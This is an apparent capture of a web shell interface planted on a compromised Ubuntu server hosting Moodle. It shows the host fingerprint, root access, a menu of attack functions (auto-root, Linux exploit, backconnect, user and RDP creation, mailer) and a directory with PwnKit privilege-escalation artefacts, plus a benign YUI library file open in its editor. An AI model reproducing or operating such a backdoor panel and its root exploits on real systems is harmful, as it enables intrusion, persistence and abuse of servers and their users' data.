Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
yuilib /
3.17.2 /
node-load /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
node-load-debug.js
1.79
KB
-rwxrwxrwx
node-load-min.js
582
B
-rwxrwxrwx
node-load.js
1.79
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : node-load.js
/* YUI 3.17.2 (build 9c3c78e) Copyright 2014 Yahoo! Inc. All rights reserved. Licensed under the BSD License. http://yuilibrary.com/license/ */ YUI.add('node-load', function (Y, NAME) { /** * Extended Node interface with a basic IO API. * @module node * @submodule node-load */ /** * The default IO complete handler. * @method _ioComplete * @protected * @for Node * @param {String} code The response code. * @param {Object} response The response object. * @param {Array} args An array containing the callback and selector */ Y.Node.prototype._ioComplete = function(code, response, args) { var selector = args[0], callback = args[1], tmp, content; if (response && response.responseText) { content = response.responseText; if (selector) { tmp = Y.DOM.create(content); content = Y.Selector.query(selector, tmp); } this.setContent(content); } if (callback) { callback.call(this, code, response); } }; /** * Loads content from the given url and replaces the Node's * existing content with the remote content. * @method load * @param {String} url The URL to load via XMLHttpRequest. * @param {String} selector An optional selector representing a subset of an HTML document to load. * @param {Function} callback An optional function to run after the content has been loaded. * @chainable */ Y.Node.prototype.load = function(url, selector, callback) { if (typeof selector == 'function') { callback = selector; selector = null; } var config = { context: this, on: { complete: this._ioComplete }, arguments: [selector, callback] }; Y.io(url, config); return this; }; }, '3.17.2', {"requires": ["node-base", "io-base"]});
Close